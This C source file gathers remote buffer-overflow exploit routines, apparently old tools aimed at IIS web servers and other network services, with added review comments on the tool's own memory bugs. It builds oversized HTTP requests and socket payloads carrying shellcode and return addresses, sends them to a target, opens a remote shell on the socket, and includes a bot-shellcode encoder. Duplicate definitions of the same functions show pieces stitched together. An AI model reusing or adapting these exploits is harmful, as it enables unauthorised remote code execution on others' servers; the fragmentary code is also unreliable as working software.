//* int main() { GetShellcode(); PrintSc(sh_Buff, sh_Len); //void(*code)() = (void *)sh_Buff; //code(); }
/*
 * Formats an HTTP GET request into `buffer` (bounded to BUFFSIZE by
 * _snprintf) and then appends the raw bytes produced by getoverbuff().
 * Returns the total byte count written: strlen(formatted text) + `i`.
 * `offset` is accepted but never read in this version.
 *
 * NOTE(review): this routine is not memory-safe in its own right; every
 * bound depends on BUFFSIZE, which is defined outside this listing.
 *  - memset() fills all BUFFSIZE bytes of shellcodebuff with '7' and leaves
 *    no NUL terminator, so the strcat() calls below scan past the array (UB).
 *  - the loop runs for j = 0, 4, ..., 0xe000 and appends 4 bytes each time
 *    (about 0xe004 bytes in total) with no comparison against BUFFSIZE, i.e.
 *    a stack overflow inside this tool unless BUFFSIZE is very large.
 *  - the return value of GetShellcode() is stored in j and then discarded,
 *    because the loop reuses j as its counter.
 *  - memcpy() of `i` bytes at buffer+j is not checked against the caller's
 *    buffer size; only the formatted prefix is bounded.
 *  - _snprintf() truncation is not detected (return value unused).
 */
int GetOverStr(char *buffer,char *server,char *urlfile,int offset) {
    char shellcodebuff[BUFFSIZE];
    char overbuff[BUFFSIZE];
    int i,j;
    char *url="/iisstart.asp";          /* default path, replaced when urlfile is given */
    char overstr[]="GET %s?!!ko HTTP/1.1\r\nHOST:%s\r\nContent-Type: application/x-www-form-urlencoded%s\r\nContent-length: 2147506431\r\n\r\n";
    if(urlfile!=NULL) url=urlfile;
    memset(shellcodebuff,'7',BUFFSIZE);//NOPCODE,BUFFSIZE);  -- no terminating NUL is written
    i=getoverbuff(overbuff);            /* byte count placed in overbuff; not bounds-checked here */
    j=GetShellcode(shellcodebuff+0x1000); /* result overwritten by the loop counter below */
    for(j=0;j<=0xe000;j+=4) {
        strcat(shellcodebuff,"\x41\x41\x41\x41"); /* unbounded append, see NOTE above */
    }
    _snprintf(buffer,BUFFSIZE,overstr,url,server,shellcodebuff);
    j=strlen(buffer);
    memcpy(buffer+j,overbuff,i);        /* trailer copied past the formatted text, unchecked */
    return (j+i);
}
/*
 * Second definition of GetOverStr (same name and arity as the one above, so
 * the two cannot be linked into a single binary). Formats an HTTP GET whose
 * path is `url` immediately followed by the contents of overbuff, and
 * returns strlen(buffer).
 *
 * NOTE(review):
 *  - the parameter is `offset2`, but the body assigns to `offset`, which is
 *    not declared in this function; this compiles only if a file-scope
 *    `offset` exists elsewhere, and the computed value is never used here.
 *  - memcpy() writes `postbytes` bytes at overbuff+0x730 without checking
 *    that 0x730 + postbytes <= BUFFSIZE.
 *  - overbuff is consumed through %s and therefore must be NUL-terminated;
 *    nothing visible here guarantees that (getoverbuff()'s contract is not
 *    shown).
 *  - findshellcodebuff and findshellbytes are unused (their only use is
 *    commented out); `i` is assigned but never read.
 *  - _snprintf() truncation is not detected.
 */
int GetOverStr(char *buffer,char *server,char *urlfile,int offset2) {
    char findshellcodebuff[BUFFSIZE];   /* unused in this version */
    char shellcodebuff[BUFFSIZE];
    char overbuff[BUFFSIZE];
    int i,findshellbytes,postbytes;
    char *url="/default.asp";           /* default path, replaced when urlfile is given */
    char overstr[]="GET %s%s?koko HTTP/1.1\r\nHOST:%s\r\nContent-Type: text/html\r\n\r\n";
    if(urlfile!=NULL) url=urlfile;
    offset=offset-strlen(url)-4;        /* NB: `offset`, not the `offset2` parameter; result unused */
    i=getoverbuff(overbuff);
    // findshellbytes=GetFindShellcode(findshellcodebuff);
    postbytes=GetShellcode(shellcodebuff);
    memcpy(overbuff+0x730,shellcodebuff,postbytes); /* no check against BUFFSIZE */
    _snprintf(buffer,BUFFSIZE,overstr,url,overbuff,server); //,i,overbuff); //,shellcodebuff);
    // strcpy(buffer+strlen(buffer)+1,shellcodebuff);
    return (strlen(buffer)); //+postbytes+1);
}
/*
 * Entry point: connects to argv[1]:argv[2] via Make_Connection(), fills a
 * 1024-byte buffer with a repeated 4-byte word, copies the global sh_Buff
 * (sh_Len bytes) to the tail of the buffer, overwrites the first 92 bytes
 * with RET, sends the buffer, sends one byte with flags=1, sleeps, and
 * passes the socket to shell().
 *
 * NOTE(review), memory-safety defects in this program itself:
 *  - `Buff[sizeof(Buff)] = 0;` writes index 1024 of a 1024-byte array, one
 *    byte past the end (UB; corrupts whatever is adjacent on the stack).
 *  - the memcpy() destination `&Buff[sizeof(Buff) - sh_Len]` is not guarded
 *    by a check that sh_Len <= sizeof(Buff); a larger sh_Len wraps the
 *    size_t index and writes out of bounds.
 *  - the stores through `unsigned long *ps` assume a 4-byte unsigned long;
 *    on an LP64 ABI the sizeof(Buff)/4 iterations write 2048 bytes into a
 *    1024-byte array. Accessing an unsigned char array through an unsigned
 *    long lvalue also violates the aliasing rules.
 *  - `i = sh_Len % 4;` is a dead store; `k` is unused; `i<sizeof(Buff)/4`
 *    compares int with size_t.
 *  - atoi(argv[2]) performs no validation (non-numeric input yields 0);
 *    `if (!s)` presumes Make_Connection() returns 0 on failure -- confirm.
 *  - the second send() passes the literal 1 as flags; the error text calls
 *    it OOB, so the named MSG_OOB constant would document the intent.
 *  - main falls off the end without a return statement.
 */
int main(int argc, char *argv[]) {
    unsigned char Buff[1024];
    unsigned char data;
    unsigned long *ps;
    int s, i, k;                        /* k is never used */
    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
        return -1;
    }
    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    if (!s) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }
    GetShellcode();                     /* populates the globals sh_Buff / sh_Len (defined elsewhere) */
    ps = (unsigned long *)Buff;
    for(i=0; i<sizeof(Buff)/4; i++) {   /* assumes sizeof(unsigned long) == 4 */
        *(ps++) = 0x60000000;
    }
    i = sh_Len % 4;                     /* dead store: overwritten before use */
    memcpy(&Buff[sizeof(Buff) - sh_Len], sh_Buff, sh_Len); /* no sh_Len <= sizeof(Buff) check */
    ps = (unsigned long *)Buff;
    for(i=0; i<92/4; i++) {
        *(ps++) = RET;
    }
    Buff[sizeof(Buff)] = 0;             /* BUG: one-past-the-end write */
    //PrintSc(Buff, sizeof(Buff));
    i = send(s, Buff, sizeof(Buff), 0);
    if (i <= 0) {
        fprintf(stderr, "[-] Send failed. \n");
        return -1;
    }
    data='I';
    i = send(s, &data, 1, 1);           /* flags = 1, see NOTE above */
    if (i <= 0) {
        fprintf(stderr, "[-] Send OOB data failed. \n");
        return -1;
    }
    sleep (1);
    shell(s);                           /* defined elsewhere; takes over the connected socket */
}
/*
 * Produces an EncodeRNS0()-encoded copy of the shellcode into `buffer`.
 *
 * @param buffer        destination for the encoded bytes
 * @param buffersize    capacity of `buffer`, passed on to EncodeRNS0()
 * @param ownip         forwarded to the size/shellcode generators
 * @param botfilename   forwarded to the size/shellcode generators
 * @return the value returned by EncodeRNS0(), or 0 when the pre-computed
 *         encoded size exceeds `buffersize` or 65535.
 *
 * NOTE(review):
 *  - malloc() is unchecked; a NULL result flows straight into GetShellcode()
 *    and EncodeRNS0().
 *  - GetShellcodeSize(ownip, botfilename) is evaluated twice; the +257 bytes
 *    of slack on the allocation are undocumented -- presumably headroom
 *    needed by GetShellcode(), confirm against its contract.
 *  - the early rejection uses GetRNS0TerminatedShellcodeSize(), a separate
 *    estimate; the actual bound on the write into `buffer` is whatever
 *    EncodeRNS0() does with `buffersize`, which is not visible here.
 *  - the cast on malloc() is unnecessary in C.
 */
DWORD GetRNS0TerminatedShellcode(char *buffer, DWORD buffersize, char *ownip, char *botfilename) {
    DWORD RNS0TerminatedShellcodeSize = GetRNS0TerminatedShellcodeSize(ownip, botfilename);
    if (RNS0TerminatedShellcodeSize > buffersize) return 0;
    if (RNS0TerminatedShellcodeSize > 65535) return 0;   /* upper limit of the encoder? -- undocumented */
    char *Shellcode = (char *)malloc(GetShellcodeSize(ownip, botfilename)+257); /* unchecked allocation */
    DWORD ShellcodeSize = GetShellcode(Shellcode, GetShellcodeSize(ownip, botfilename), ownip, botfilename);
    RNS0TerminatedShellcodeSize = EncodeRNS0(buffer, buffersize, Shellcode, ShellcodeSize);
    free(Shellcode);
    return RNS0TerminatedShellcodeSize;
}
/*
 * Entry point, variant of the main() above: connects to argv[1]:argv[2],
 * fills a 1024-byte buffer with 0x90, strcpy()s the global sh_Buff so that
 * it ends at the last byte, overwrites the first 128 bytes with RET, sends
 * the buffer, sends one byte with flags=1, sleeps, and passes the socket to
 * shell().
 *
 * NOTE(review):
 *  - strcpy() copies sh_Buff as a C string; the destination offset is
 *    computed from sh_Len, so if strlen(sh_Buff) != sh_Len or
 *    sh_Len + 1 > sizeof(Buff) the copy runs outside Buff. Neither
 *    condition is checked here.
 *  - the RET loop assumes sizeof(unsigned long) == 4; on an LP64 ABI it
 *    writes 256 bytes instead of 128 and the store also violates the
 *    aliasing rules for an unsigned char array.
 *  - `Buff[sizeof(Buff) - 1] = 0;` is in bounds (unlike the other main()).
 *  - atoi(argv[2]) is unvalidated; `if (!s)` presumes Make_Connection()
 *    returns 0 on failure -- confirm.
 *  - the second send() passes the literal 1 as flags where the error text
 *    implies MSG_OOB; the named constant would document the intent.
 *  - main falls off the end without a return statement.
 */
int main(int argc, char *argv[]) {
    unsigned char Buff[1024];
    unsigned char data;
    unsigned long *ps;
    int s, i;
    if (argc < 3) {
        fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
        return -1;
    }
    s = Make_Connection(argv[1], atoi(argv[2]), 10);
    if (!s) {
        fprintf(stderr, "[-] Connect failed. \n");
        return -1;
    }
    GetShellcode();                     /* populates the globals sh_Buff / sh_Len (defined elsewhere) */
    PrintSc(sh_Buff, sh_Len);           /* diagnostic dump of the payload */
    memset(Buff, 0x90, sizeof(Buff));
    strcpy(Buff + (sizeof(Buff) - sh_Len - 1), sh_Buff); /* unbounded; see NOTE above */
    ps = (unsigned long *)Buff;
    for(i=0; i<128/4; i++) {            /* assumes sizeof(unsigned long) == 4 */
        *(ps++) = RET;
    }
    Buff[sizeof(Buff) - 1] = 0;
    i = send(s, Buff, sizeof(Buff), 0);
    if (i <= 0) {
        fprintf(stderr, "[-] Send failed. \n");
        return -1;
    }
    data='I';
    i = send(s, &data, 1, 1);           /* flags = 1, see NOTE above */
    if (i <= 0) {
        fprintf(stderr, "[-] Send OOB data failed. \n");
        return -1;
    }
    sleep (1);
    // get shell use same socket
    shell(s);                           /* defined elsewhere; takes over the connected socket */
}